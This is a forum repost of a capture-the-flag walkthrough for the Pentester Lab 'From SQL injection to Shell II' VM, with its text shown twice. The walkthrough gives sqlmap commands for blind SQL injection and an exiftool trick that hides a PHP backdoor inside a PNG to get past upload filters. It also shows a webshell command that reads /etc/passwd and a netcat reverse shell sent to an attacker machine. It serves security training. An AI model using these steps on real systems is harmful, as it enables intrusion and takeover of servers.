KeCa
Organic Traffic Architect
LEVEL 1
300 XP
Hello friends!! Today we are going to solve another CTF challenge āFrom SQL injection to Shell IIā and you can read part 1 from here. This VM is developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the iso image in VM ware and start it. The task given in this lab is to gain access to administration console and upload PHP webshell.
Level: Intermediate
Penetrating Methodologies
Walkthrough
The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.
Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test;ruxcon; 2010; all pictures; admin. Click on the test.
The given URL: http://192.168.1.102/cat.php?id=1 will run SQL query for ID 1 now let try to find out whether the above URL is vulnerable to SQL injection or not by adding(ā) apostrophe at last of URL:
Unfortunately, this page is not vulnerable to error based SQL injection as the author already mentioned here you will learn āBlind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshellā
Then I had used acunetix to scan the target which has declared the level of threat is high for blind SQL injection.
Hence it is clear that exploit the target through SQL injection.
And after little more research work, I found the way to exploit it using sqlmap.
If you remembered the title of the web page was āAn Awesome Photoblogā hence name of the database must be a photoblog.
Now letās fetch entire data under photoblog database through the following command:
Now try to use above credential to access administration console, again open target IP: 192.168.1.102 in the browser and click on login tab and type login as admin and password as P4ssw0rd.
Congrats!!! The first task is completed.
Now the last task is to upload PHP webshell. Under administration console, you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload an image.
I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.
Then I use ExifTool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image ā1.pngā and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.
Now type command for ExifTool to hide malicious code of php file inside the png image.
As you can observe, the malicious code is hidden inside the image.
Now I had browse 1.png to add it as a new image which is our php webshell.
Our malicious file successfully uploaded on the web server. You can see a new row is added as webshell php which contains our php backdoor, now click on the backdoor.
Yuppie we have uploaded the image with hidden backdoor inside, now try to execute it.
After inspecting its source code we found link uploaded image, now letās try to open it.
As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.
And you can observe, we have successfully pulled the passwd file successfully, hence now can spawn victimās shell through it.
Letās run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.
Superb!!! We completed our last challenge also here we have spawned victim web shell.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Install the iso image in VM ware and start it. The task given in this lab is to gain access to administration console and upload PHP webshell.
Level: Intermediate
Penetrating Methodologies
- Network Scanning (Nmap)
- Vulnerable to Blind Time-Base SQL Injection
- Exploiting SQL Injection (SQLMAP)
- Hiding web shell inside Image (ExifTool)
- Uploading Web shell
- Spawning Shell (Netcat)
Walkthrough
The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.
Code:
nmap -A 192.168.1.102Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test;ruxcon; 2010; all pictures; admin. Click on the test.
The given URL: http://192.168.1.102/cat.php?id=1 will run SQL query for ID 1 now let try to find out whether the above URL is vulnerable to SQL injection or not by adding(ā) apostrophe at last of URL:
Unfortunately, this page is not vulnerable to error based SQL injection as the author already mentioned here you will learn āBlind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshellā
Then I had used acunetix to scan the target which has declared the level of threat is high for blind SQL injection.
Hence it is clear that exploit the target through SQL injection.
And after little more research work, I found the way to exploit it using sqlmap.
Code:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=āX-Forwarded-For: *ā --dbs --dump-all --batchIf you remembered the title of the web page was āAn Awesome Photoblogā hence name of the database must be a photoblog.
Now letās fetch entire data under photoblog database through the following command:
Code:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=āX-Forwarded-For: *ā -D photoblog --dump-all --batchNow try to use above credential to access administration console, again open target IP: 192.168.1.102 in the browser and click on login tab and type login as admin and password as P4ssw0rd.
Congrats!!! The first task is completed.
Now the last task is to upload PHP webshell. Under administration console, you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload an image.
I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.
Then I use ExifTool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image ā1.pngā and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.
Now type command for ExifTool to hide malicious code of php file inside the png image.
Code:
cd Desktop
exiftool "-comment<= simple-backdoor.php" 1.png
exiftool 1.pngAs you can observe, the malicious code is hidden inside the image.
Now I had browse 1.png to add it as a new image which is our php webshell.
Our malicious file successfully uploaded on the web server. You can see a new row is added as webshell php which contains our php backdoor, now click on the backdoor.
Yuppie we have uploaded the image with hidden backdoor inside, now try to execute it.
After inspecting its source code we found link uploaded image, now letās try to open it.
As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.
Code:
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/passwordAnd you can observe, we have successfully pulled the passwd file successfully, hence now can spawn victimās shell through it.
Letās run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.
Code:
nc -lvp 6666
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/shSuperb!!! We completed our last challenge also here we have spawned victim web shell.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here